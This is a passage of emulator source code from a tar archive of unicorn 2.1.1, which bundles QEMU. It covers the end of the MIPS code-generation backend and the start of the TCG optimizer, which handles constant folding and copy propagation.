tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_RA, 0); /* t3 = dcba -- delay slot */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); if (TCG_TARGET_REG_BITS == 32) { return; } /* * bswap32u -- unsigned 32-bit swap. a0 = ....abcd. */ bswap32u_addr = align_code_ptr(s); /* t1 = (0000)000d */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP0, 0xff); /* t3 = 000a */ tcg_out_opc_sa(s, OPC_SRL, TCG_TMP3, TCG_TMP0, 24); /* t1 = (0000)d000 */ tcg_out_dsll(s, TCG_TMP1, TCG_TMP1, 24); /* t2 = 00c0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP2, TCG_TMP0, 0xff00); /* t3 = d00a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* t1 = 0abc */ tcg_out_opc_sa(s, OPC_SRL, TCG_TMP1, TCG_TMP0, 8); /* t2 = 0c00 */ tcg_out_opc_sa(s, OPC_SLL, TCG_TMP2, TCG_TMP2, 8); /* t1 = 00b0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP1, 0xff00); /* t3 = dc0a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP2); tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_RA, 0); /* t3 = dcba -- delay slot */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* * bswap64 -- 64-bit swap. a0 = abcdefgh */ bswap64_addr = align_code_ptr(s); /* t3 = h0000000 */ tcg_out_dsll(s, TCG_TMP3, TCG_TMP0, 56); /* t1 = 0000000a */ tcg_out_dsrl(s, TCG_TMP1, TCG_TMP0, 56); /* t2 = 000000g0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP2, TCG_TMP0, 0xff00); /* t3 = h000000a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* t1 = 00000abc */ tcg_out_dsrl(s, TCG_TMP1, TCG_TMP0, 40); /* t2 = 0g000000 */ tcg_out_dsll(s, TCG_TMP2, TCG_TMP2, 40); /* t1 = 000000b0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP1, 0xff00); /* t3 = hg00000a */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP2); /* t2 = 0000abcd */ tcg_out_dsrl(s, TCG_TMP2, TCG_TMP0, 32); /* t3 = hg0000ba */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* t1 = 000000c0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP2, 0xff00); /* t2 = 0000000d */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP2, TCG_TMP2, 0x00ff); /* t1 = 00000c00 */ tcg_out_dsll(s, TCG_TMP1, TCG_TMP1, 8); /* t2 = 0000d000 */ tcg_out_dsll(s, TCG_TMP2, TCG_TMP2, 24); /* t3 = hg000cba */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); /* t1 = 00abcdef */ tcg_out_dsrl(s, TCG_TMP1, TCG_TMP0, 16); /* t3 = hg00dcba */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP2); /* t2 = 0000000f */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP2, TCG_TMP1, 0x00ff); /* t1 = 000000e0 */ tcg_out_opc_imm(s, OPC_ANDI, TCG_TMP1, TCG_TMP1, 0xff00); /* t2 = 00f00000 */ tcg_out_dsll(s, TCG_TMP2, TCG_TMP2, 40); /* t1 = 000e0000 */ tcg_out_dsll(s, TCG_TMP1, TCG_TMP1, 24); /* t3 = hgf0dcba */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP2); tcg_out_opc_reg(s, OPC_JR, 0, TCG_REG_RA, 0); /* t3 = hgfedcba -- delay slot */ tcg_out_opc_reg(s, OPC_OR, TCG_TMP3, TCG_TMP3, TCG_TMP1); } static void tcg_target_init(TCGContext *s) { tcg_target_detect_isa(); s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffffffff; if (TCG_TARGET_REG_BITS == 64) { s->tcg_target_available_regs[TCG_TYPE_I64] = 0xffffffff; } s->tcg_target_call_clobber_regs = 0; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_V1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_A0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_A1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_A2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_A3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T4); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T5); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T6); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T7); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T8); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_T9); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_REG_ZERO); /* zero register */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_K0); /* kernel use only */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_K1); /* kernel use only */ tcg_regset_set_reg(s->reserved_regs, TCG_TMP0); /* internal use */ tcg_regset_set_reg(s->reserved_regs, TCG_TMP1); /* internal use */ tcg_regset_set_reg(s->reserved_regs, TCG_TMP2); /* internal use */ tcg_regset_set_reg(s->reserved_regs, TCG_TMP3); /* internal use */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_RA); /* return address */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_SP); /* stack pointer */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_GP); /* global pointer */ } void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { atomic_set((uint32_t *)jmp_addr, deposit32(OPC_J, 0, 26, addr >> 2)); flush_icache_range(jmp_addr, jmp_addr + 4); } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[ARRAY_SIZE(tcg_target_callee_save_regs) * 2]; } DebugFrame; #define ELF_HOST_MACHINE EM_MIPS /* GDB doesn't appear to require proper setting of ELF_HOST_FLAGS, which is good because they're really quite complicated for MIPS. */ static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE) - 4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = -(TCG_TARGET_REG_BITS / 8) & 0x7f, /* sleb128 */ .h.cie.return_column = TCG_REG_RA, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, TCG_REG_SP, /* DW_CFA_def_cfa sp, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { 0x80 + 16, 9, /* DW_CFA_offset, s0, -72 */ 0x80 + 17, 8, /* DW_CFA_offset, s2, -64 */ 0x80 + 18, 7, /* DW_CFA_offset, s3, -56 */ 0x80 + 19, 6, /* DW_CFA_offset, s4, -48 */ 0x80 + 20, 5, /* DW_CFA_offset, s5, -40 */ 0x80 + 21, 4, /* DW_CFA_offset, s6, -32 */ 0x80 + 22, 3, /* DW_CFA_offset, s7, -24 */ 0x80 + 30, 2, /* DW_CFA_offset, s8, -16 */ 0x80 + 31, 1, /* DW_CFA_offset, ra, -8 */ } }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/tcg/optimize.c�������������������������������������������������������������������0000664�0000000�0000000�00000142025�14675241067�0016740�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Optimizations for Tiny Code Generator for QEMU * * Copyright (c) 2010 Samsung Electronics. * Contributed by Kirill Batuzov <batuzovk@ispras.ru> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "qemu/osdep.h" #include "tcg/tcg-op.h" #define CASE_OP_32_64(x) \ glue(glue(case INDEX_op_, x), _i32): \ glue(glue(case INDEX_op_, x), _i64) #define CASE_OP_32_64_VEC(x) \ glue(glue(case INDEX_op_, x), _i32): \ glue(glue(case INDEX_op_, x), _i64): \ glue(glue(case INDEX_op_, x), _vec) struct tcg_temp_info { bool is_const; TCGTemp *prev_copy; TCGTemp *next_copy; tcg_target_ulong val; tcg_target_ulong mask; }; static inline struct tcg_temp_info *ts_info(TCGTemp *ts) { return ts->state_ptr; } static inline struct tcg_temp_info *arg_info(TCGArg arg) { return ts_info(arg_temp(arg)); } static inline bool ts_is_const(TCGTemp *ts) { return ts_info(ts)->is_const; } static inline bool arg_is_const(TCGArg arg) { return ts_is_const(arg_temp(arg)); } static inline bool ts_is_copy(TCGTemp *ts) { return ts_info(ts)->next_copy != ts; } /* Reset TEMP's state, possibly removing the temp for the list of copies. */ static void reset_ts(TCGTemp *ts) { struct tcg_temp_info *ti = ts_info(ts); struct tcg_temp_info *pi = ts_info(ti->prev_copy); struct tcg_temp_info *ni = ts_info(ti->next_copy); ni->prev_copy = ti->prev_copy; pi->next_copy = ti->next_copy; ti->next_copy = ts; ti->prev_copy = ts; ti->is_const = false; ti->mask = -1; } static void reset_temp(TCGArg arg) { reset_ts(arg_temp(arg)); } /* Initialize and activate a temporary. */ static void init_ts_info(TCGContext *tcg_ctx, struct tcg_temp_info *infos, TCGTempSet *temps_used, TCGTemp *ts) { size_t idx = temp_idx(tcg_ctx, ts); if (!test_bit(idx, temps_used->l)) { struct tcg_temp_info *ti = &infos[idx]; ts->state_ptr = ti; ti->next_copy = ts; ti->prev_copy = ts; ti->is_const = false; ti->mask = -1; set_bit(idx, temps_used->l); } } static void init_arg_info(TCGContext *tcg_ctx, struct tcg_temp_info *infos, TCGTempSet *temps_used, TCGArg arg) { init_ts_info(tcg_ctx, infos, temps_used, arg_temp(arg)); } static TCGTemp *find_better_copy(TCGContext *s, TCGTemp *ts) { TCGTemp *i; /* If this is already a global, we can't do better. */ if (ts->temp_global) { return ts; } /* Search for a global first. */ for (i = ts_info(ts)->next_copy; i != ts; i = ts_info(i)->next_copy) { if (i->temp_global) { return i; } } /* If it is a temp, search for a temp local. */ if (!ts->temp_local) { for (i = ts_info(ts)->next_copy; i != ts; i = ts_info(i)->next_copy) { if (ts->temp_local) { return i; } } } /* Failure to find a better representation, return the same temp. */ return ts; } static bool ts_are_copies(TCGTemp *ts1, TCGTemp *ts2) { TCGTemp *i; if (ts1 == ts2) { return true; } if (!ts_is_copy(ts1) || !ts_is_copy(ts2)) { return false; } for (i = ts_info(ts1)->next_copy; i != ts1; i = ts_info(i)->next_copy) { if (i == ts2) { return true; } } return false; } static bool args_are_copies(TCGArg arg1, TCGArg arg2) { return ts_are_copies(arg_temp(arg1), arg_temp(arg2)); } static void tcg_opt_gen_movi(TCGContext *s, TCGOp *op, TCGArg dst, TCGArg val) { const TCGOpDef *def; TCGOpcode new_op; tcg_target_ulong mask; struct tcg_temp_info *di = arg_info(dst); def = &s->tcg_op_defs[op->opc]; if (def->flags & TCG_OPF_VECTOR) { new_op = INDEX_op_dupi_vec; } else if (def->flags & TCG_OPF_64BIT) { new_op = INDEX_op_movi_i64; } else { new_op = INDEX_op_movi_i32; } op->opc = new_op; /* TCGOP_VECL and TCGOP_VECE remain unchanged. */ op->args[0] = dst; op->args[1] = val; reset_temp(dst); di->is_const = true; di->val = val; mask = val; if (TCG_TARGET_REG_BITS > 32 && new_op == INDEX_op_movi_i32) { /* High bits of the destination are now garbage. */ mask |= ~0xffffffffull; } di->mask = mask; } static void tcg_opt_gen_mov(TCGContext *s, TCGOp *op, TCGArg dst, TCGArg src) { TCGTemp *dst_ts = arg_temp(dst); TCGTemp *src_ts = arg_temp(src); const TCGOpDef *def; struct tcg_temp_info *di; struct tcg_temp_info *si; tcg_target_ulong mask; TCGOpcode new_op; if (ts_are_copies(dst_ts, src_ts)) { tcg_op_remove(s, op); return; } reset_ts(dst_ts); di = ts_info(dst_ts); si = ts_info(src_ts); def = &s->tcg_op_defs[op->opc]; if (def->flags & TCG_OPF_VECTOR) { new_op = INDEX_op_mov_vec; } else if (def->flags & TCG_OPF_64BIT) { new_op = INDEX_op_mov_i64; } else { new_op = INDEX_op_mov_i32; } op->opc = new_op; /* TCGOP_VECL and TCGOP_VECE remain unchanged. */ op->args[0] = dst; op->args[1] = src; mask = si->mask; if (TCG_TARGET_REG_BITS > 32 && new_op == INDEX_op_mov_i32) { /* High bits of the destination are now garbage. */ mask |= ~0xffffffffull; } di->mask = mask; if (src_ts->type == dst_ts->type) { struct tcg_temp_info *ni = ts_info(si->next_copy); di->next_copy = si->next_copy; di->prev_copy = src_ts; ni->prev_copy = dst_ts; si->next_copy = dst_ts; di->is_const = si->is_const; di->val = si->val; } } static TCGArg do_constant_folding_2(TCGOpcode op, TCGArg x, TCGArg y) { uint64_t l64, h64; switch (op) { CASE_OP_32_64(add): return x + y; CASE_OP_32_64(sub): return x - y; CASE_OP_32_64(mul): return x * y; CASE_OP_32_64(and): return x & y; CASE_OP_32_64(or): return x | y; CASE_OP_32_64(xor): return x ^ y; case INDEX_op_shl_i32: return (uint32_t)x << (y & 31); case INDEX_op_shl_i64: return (uint64_t)x << (y & 63); case INDEX_op_shr_i32: return (uint32_t)x >> (y & 31); case INDEX_op_shr_i64: return (uint64_t)x >> (y & 63); case INDEX_op_sar_i32: return (int32_t)x >> (y & 31); case INDEX_op_sar_i64: return (int64_t)x >> (y & 63); case INDEX_op_rotr_i32: return ror32(x, y & 31); case INDEX_op_rotr_i64: return ror64(x, y & 63); case INDEX_op_rotl_i32: return rol32(x, y & 31); case INDEX_op_rotl_i64: return rol64(x, y & 63); CASE_OP_32_64(not): return ~x; CASE_OP_32_64(neg): #ifdef _MSC_VER return (0 - x); #else return -x; #endif CASE_OP_32_64(andc): return x & ~y; CASE_OP_32_64(orc): return x | ~y; CASE_OP_32_64(eqv): return ~(x ^ y); CASE_OP_32_64(nand): return ~(x & y); CASE_OP_32_64(nor): return ~(x | y); case INDEX_op_clz_i32: return (uint32_t)x ? clz32(x) : y; case INDEX_op_clz_i64: return x ? clz64(x) : y; case INDEX_op_ctz_i32: return (uint32_t)x ? ctz32(x) : y; case INDEX_op_ctz_i64: return x ? ctz64(x) : y; case INDEX_op_ctpop_i32: return ctpop32(x); case INDEX_op_ctpop_i64: return ctpop64(x); CASE_OP_32_64(ext8s): return (int8_t)x; CASE_OP_32_64(ext16s): return (int16_t)x; CASE_OP_32_64(ext8u): return (uint8_t)x; CASE_OP_32_64(ext16u): return (uint16_t)x; CASE_OP_32_64(bswap16): return bswap16(x); CASE_OP_32_64(bswap32): return bswap32(x); case INDEX_op_bswap64_i64: return bswap64(x); case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: return (int32_t)x; case INDEX_op_extu_i32_i64: case INDEX_op_extrl_i64_i32: case INDEX_op_ext32u_i64: return (uint32_t)x; case INDEX_op_extrh_i64_i32: return (uint64_t)x >> 32; case INDEX_op_muluh_i32: return ((uint64_t)(uint32_t)x * (uint32_t)y) >> 32; case INDEX_op_mulsh_i32: return ((int64_t)(int32_t)x * (int32_t)y) >> 32; case INDEX_op_muluh_i64: mulu64(&l64, &h64, x, y); return h64; case INDEX_op_mulsh_i64: muls64(&l64, &h64, x, y); return h64; case INDEX_op_div_i32: /* Avoid crashing on divide by zero, otherwise undefined. */ return (int32_t)x / ((int32_t)y ? (int32_t)y : 1); case INDEX_op_divu_i32: return (uint32_t)x / ((uint32_t)y ? (uint32_t)y : 1); case INDEX_op_div_i64: return (int64_t)x / ((int64_t)y ? (int64_t)y : 1); case INDEX_op_divu_i64: return (uint64_t)x / ((uint64_t)y ? (uint64_t)y : 1); case INDEX_op_rem_i32: return (int32_t)x % ((int32_t)y ? (int32_t)y : 1); case INDEX_op_remu_i32: return (uint32_t)x % ((uint32_t)y ? (uint32_t)y : 1); case INDEX_op_rem_i64: return (int64_t)x % ((int64_t)y ? (int64_t)y : 1); case INDEX_op_remu_i64: return (uint64_t)x % ((uint64_t)y ? (uint64_t)y : 1); default: fprintf(stderr, "Unrecognized operation %d in do_constant_folding.\n", op); tcg_abort(); } } static TCGArg do_constant_folding(TCGContext *s, TCGOpcode op, TCGArg x, TCGArg y) { const TCGOpDef *def = &s->tcg_op_defs[op]; TCGArg res = do_constant_folding_2(op, x, y); if (!(def->flags & TCG_OPF_64BIT)) { res = (int32_t)res; } return res; } static bool do_constant_folding_cond_32(uint32_t x, uint32_t y, TCGCond c) { switch (c) { case TCG_COND_EQ: return x == y; case TCG_COND_NE: return x != y; case TCG_COND_LT: return (int32_t)x < (int32_t)y; case TCG_COND_GE: return (int32_t)x >= (int32_t)y; case TCG_COND_LE: return (int32_t)x <= (int32_t)y; case TCG_COND_GT: return (int32_t)x > (int32_t)y; case TCG_COND_LTU: return x < y; case TCG_COND_GEU: return x >= y; case TCG_COND_LEU: return x <= y; case TCG_COND_GTU: return x > y; default: tcg_abort(); } } static bool do_constant_folding_cond_64(uint64_t x, uint64_t y, TCGCond c) { switch (c) { case TCG_COND_EQ: return x == y; case TCG_COND_NE: return x != y; case TCG_COND_LT: return (int64_t)x < (int64_t)y; case TCG_COND_GE: return (int64_t)x >= (int64_t)y; case TCG_COND_LE: return (int64_t)x <= (int64_t)y; case TCG_COND_GT: return (int64_t)x > (int64_t)y; case TCG_COND_LTU: return x < y; case TCG_COND_GEU: return x >= y; case TCG_COND_LEU: return x <= y; case TCG_COND_GTU: return x > y; default: tcg_abort(); } } static bool do_constant_folding_cond_eq(TCGCond c) { switch (c) { case TCG_COND_GT: case TCG_COND_LTU: case TCG_COND_LT: case TCG_COND_GTU: case TCG_COND_NE: return 0; case TCG_COND_GE: case TCG_COND_GEU: case TCG_COND_LE: case TCG_COND_LEU: case TCG_COND_EQ: return 1; default: tcg_abort(); } } /* Return 2 if the condition can't be simplified, and the result of the condition (0 or 1) if it can */ static TCGArg do_constant_folding_cond(TCGContext *s, TCGOpcode op, TCGArg x, TCGArg y, TCGCond c) { tcg_target_ulong xv = arg_info(x)->val; tcg_target_ulong yv = arg_info(y)->val; if (arg_is_const(x) && arg_is_const(y)) { const TCGOpDef *def = &s->tcg_op_defs[op]; tcg_debug_assert(!(def->flags & TCG_OPF_VECTOR)); if (def->flags & TCG_OPF_64BIT) { return do_constant_folding_cond_64(xv, yv, c); } else { return do_constant_folding_cond_32(xv, yv, c); } } else if (args_are_copies(x, y)) { return do_constant_folding_cond_eq(c); } else if (arg_is_const(y) && yv == 0) { switch (c) { case TCG_COND_LTU: return 0; case TCG_COND_GEU: return 1; default: return 2; } } return 2; } /* Return 2 if the condition can't be simplified, and the result of the condition (0 or 1) if it can */ static TCGArg do_constant_folding_cond2(TCGArg *p1, TCGArg *p2, TCGCond c) { TCGArg al = p1[0], ah = p1[1]; TCGArg bl = p2[0], bh = p2[1]; if (arg_is_const(bl) && arg_is_const(bh)) { tcg_target_ulong blv = arg_info(bl)->val; tcg_target_ulong bhv = arg_info(bh)->val; uint64_t b = deposit64(blv, 32, 32, bhv); if (arg_is_const(al) && arg_is_const(ah)) { tcg_target_ulong alv = arg_info(al)->val; tcg_target_ulong ahv = arg_info(ah)->val; uint64_t a = deposit64(alv, 32, 32, ahv); return do_constant_folding_cond_64(a, b, c); } if (b == 0) { switch (c) { case TCG_COND_LTU: return 0; case TCG_COND_GEU: return 1; default: break; } } } if (args_are_copies(al, bl) && args_are_copies(ah, bh)) { return do_constant_folding_cond_eq(c); } return 2; } static bool swap_commutative(TCGArg dest, TCGArg *p1, TCGArg *p2) { TCGArg a1 = *p1, a2 = *p2; int sum = 0; sum += arg_is_const(a1); sum -= arg_is_const(a2); /* Prefer the constant in second argument, and then the form op a, a, b, which is better handled on non-RISC hosts. */ if (sum > 0 || (sum == 0 && dest == a2)) { *p1 = a2; *p2 = a1; return true; } return false; } static bool swap_commutative2(TCGArg *p1, TCGArg *p2) { int sum = 0; sum += arg_is_const(p1[0]); sum += arg_is_const(p1[1]); sum -= arg_is_const(p2[0]); sum -= arg_is_const(p2[1]); if (sum > 0) { TCGArg t; t = p1[0], p1[0] = p2[0], p2[0] = t; t = p1[1], p1[1] = p2[1], p2[1] = t; return true; } return false; } /* Propagate constants and copies, fold constant expressions. */ void tcg_optimize(TCGContext *s) { int nb_temps, nb_globals; TCGOp *op, *op_next, *prev_mb = NULL; struct tcg_temp_info *infos; TCGTempSet temps_used; /* Array VALS has an element for each temp. If this temp holds a constant then its value is kept in VALS' element. If this temp is a copy of other ones then the other copies are available through the doubly linked circular list. */ nb_temps = s->nb_temps; nb_globals = s->nb_globals; bitmap_zero(temps_used.l, nb_temps); infos = tcg_malloc(s, sizeof(struct tcg_temp_info) * nb_temps); QTAILQ_FOREACH_SAFE(op, &s->ops, link, op_next) { tcg_target_ulong mask, partmask, affected; int nb_oargs, nb_iargs, i; TCGArg tmp; TCGOpcode opc = op->opc; const TCGOpDef *def = &s->tcg_op_defs[opc]; /* Count the arguments, and initialize the temps that are going to be used */ if (opc == INDEX_op_call) { nb_oargs = TCGOP_CALLO(op); nb_iargs = TCGOP_CALLI(op); for (i = 0; i < nb_oargs + nb_iargs; i++) { TCGTemp *ts = arg_temp(op->args[i]); if (ts) { init_ts_info(s, infos, &temps_used, ts); } } } else { nb_oargs = def->nb_oargs; nb_iargs = def->nb_iargs; for (i = 0; i < nb_oargs + nb_iargs; i++) { init_arg_info(s, infos, &temps_used, op->args[i]); } } /* Do copy propagation */ for (i = nb_oargs; i < nb_oargs + nb_iargs; i++) { TCGTemp *ts = arg_temp(op->args[i]); if (ts && ts_is_copy(ts)) { op->args[i] = temp_arg(find_better_copy(s, ts)); } } /* For commutative operations make constant second argument */ switch (opc) { CASE_OP_32_64_VEC(add): CASE_OP_32_64_VEC(mul): CASE_OP_32_64_VEC(and): CASE_OP_32_64_VEC(or): CASE_OP_32_64_VEC(xor): CASE_OP_32_64(eqv): CASE_OP_32_64(nand): CASE_OP_32_64(nor): CASE_OP_32_64(muluh): CASE_OP_32_64(mulsh): swap_commutative(op->args[0], &op->args[1], &op->args[2]); break; CASE_OP_32_64(brcond): if (swap_commutative(-1, &op->args[0], &op->args[1])) { op->args[2] = tcg_swap_cond(op->args[2]); } break; CASE_OP_32_64(setcond): if (swap_commutative(op->args[0], &op->args[1], &op->args[2])) { op->args[3] = tcg_swap_cond(op->args[3]); } break; CASE_OP_32_64(movcond): if (swap_commutative(-1, &op->args[1], &op->args[2])) { op->args[5] = tcg_swap_cond(op->args[5]); } /* For movcond, we canonicalize the "false" input reg to match the destination reg so that the tcg backend can implement a "move if true" operation. */ if (swap_commutative(op->args[0], &op->args[4], &op->args[3])) { op->args[5] = tcg_invert_cond(op->args[5]); } break; CASE_OP_32_64(add2): swap_commutative(op->args[0], &op->args[2], &op->args[4]); swap_commutative(op->args[1], &op->args[3], &op->args[5]); break; CASE_OP_32_64(mulu2): CASE_OP_32_64(muls2): swap_commutative(op->args[0], &op->args[2], &op->args[3]); break; case INDEX_op_brcond2_i32: if (swap_commutative2(&op->args[0], &op->args[2])) { op->args[4] = tcg_swap_cond(op->args[4]); } break; case INDEX_op_setcond2_i32: if (swap_commutative2(&op->args[1], &op->args[3])) { op->args[5] = tcg_swap_cond(op->args[5]); } break; default: break; } /* Simplify expressions for "shift/rot r, 0, a => movi r, 0", and "sub r, 0, a => neg r, a" case. */ switch (opc) { CASE_OP_32_64(shl): CASE_OP_32_64(shr): CASE_OP_32_64(sar): CASE_OP_32_64(rotl): CASE_OP_32_64(rotr): if (arg_is_const(op->args[1]) && arg_info(op->args[1])->val == 0) { tcg_opt_gen_movi(s, op, op->args[0], 0); continue; } break; CASE_OP_32_64_VEC(sub): { TCGOpcode neg_op; bool have_neg; if (arg_is_const(op->args[2])) { /* Proceed with possible constant folding. */ break; } if (opc == INDEX_op_sub_i32) { neg_op = INDEX_op_neg_i32; have_neg = TCG_TARGET_HAS_neg_i32; } else if (opc == INDEX_op_sub_i64) { neg_op = INDEX_op_neg_i64; have_neg = TCG_TARGET_HAS_neg_i64; } else if (TCG_TARGET_HAS_neg_vec) { TCGType type = TCGOP_VECL(op) + TCG_TYPE_V64; unsigned vece = TCGOP_VECE(op); neg_op = INDEX_op_neg_vec; have_neg = tcg_can_emit_vec_op(s, neg_op, type, vece) > 0; } else { break; } if (!have_neg) { break; } if (arg_is_const(op->args[1]) && arg_info(op->args[1])->val == 0) { op->opc = neg_op; reset_temp(op->args[0]); op->args[1] = op->args[2]; continue; } } break; CASE_OP_32_64_VEC(xor): CASE_OP_32_64(nand): if (!arg_is_const(op->args[1]) && arg_is_const(op->args[2]) && arg_info(op->args[2])->val == -1) { i = 1; goto try_not; } break; CASE_OP_32_64(nor): if (!arg_is_const(op->args[1]) && arg_is_const(op->args[2]) && arg_info(op->args[2])->val == 0) { i = 1; goto try_not; } break; CASE_OP_32_64_VEC(andc): if (!arg_is_const(op->args[2]) && arg_is_const(op->args[1]) && arg_info(op->args[1])->val == -1) { i = 2; goto try_not; } break; CASE_OP_32_64_VEC(orc): CASE_OP_32_64(eqv): if (!arg_is_const(op->args[2]) && arg_is_const(op->args[1]) && arg_info(op->args[1])->val == 0) { i = 2; goto try_not; } break; try_not: { TCGOpcode not_op; bool have_not; if (def->flags & TCG_OPF_VECTOR) { not_op = INDEX_op_not_vec; have_not = TCG_TARGET_HAS_not_vec; } else if (def->flags & TCG_OPF_64BIT) { not_op = INDEX_op_not_i64; have_not = TCG_TARGET_HAS_not_i64; } else { not_op = INDEX_op_not_i32; have_not = TCG_TARGET_HAS_not_i32; } if (!have_not) { break; } op->opc = not_op; reset_temp(op->args[0]); op->args[1] = op->args[i]; continue; } default: break; } /* Simplify expression for "op r, a, const => mov r, a" cases */ switch (opc) { CASE_OP_32_64_VEC(add): CASE_OP_32_64_VEC(sub): CASE_OP_32_64_VEC(or): CASE_OP_32_64_VEC(xor): CASE_OP_32_64_VEC(andc): CASE_OP_32_64(shl): CASE_OP_32_64(shr): CASE_OP_32_64(sar): CASE_OP_32_64(rotl): CASE_OP_32_64(rotr): if (!arg_is_const(op->args[1]) && arg_is_const(op->args[2]) && arg_info(op->args[2])->val == 0) { tcg_opt_gen_mov(s, op, op->args[0], op->args[1]); continue; } break; CASE_OP_32_64_VEC(and): CASE_OP_32_64_VEC(orc): CASE_OP_32_64(eqv): if (!arg_is_const(op->args[1]) && arg_is_const(op->args[2]) && arg_info(op->args[2])->val == -1) { tcg_opt_gen_mov(s, op, op->args[0], op->args[1]); continue; } break; default: break; } /* Simplify using known-zero bits. Currently only ops with a single output argument is supported. */ mask = -1; affected = -1; switch (opc) { CASE_OP_32_64(ext8s): if ((arg_info(op->args[1])->mask & 0x80) != 0) { break; } CASE_OP_32_64(ext8u): mask = 0xff; goto and_const; CASE_OP_32_64(ext16s): if ((arg_info(op->args[1])->mask & 0x8000) != 0) { break; } CASE_OP_32_64(ext16u): mask = 0xffff; goto and_const; case INDEX_op_ext32s_i64: if ((arg_info(op->args[1])->mask & 0x80000000) != 0) { break; } case INDEX_op_ext32u_i64: mask = 0xffffffffU; goto and_const; CASE_OP_32_64(and): mask = arg_info(op->args[2])->mask; if (arg_is_const(op->args[2])) { and_const: affected = arg_info(op->args[1])->mask & ~mask; } mask = arg_info(op->args[1])->mask & mask; break; case INDEX_op_ext_i32_i64: if ((arg_info(op->args[1])->mask & 0x80000000) != 0) { break; } case INDEX_op_extu_i32_i64: /* We do not compute affected as it is a size changing op. */ mask = (uint32_t)arg_info(op->args[1])->mask; break; CASE_OP_32_64(andc): /* Known-zeros does not imply known-ones. Therefore unless 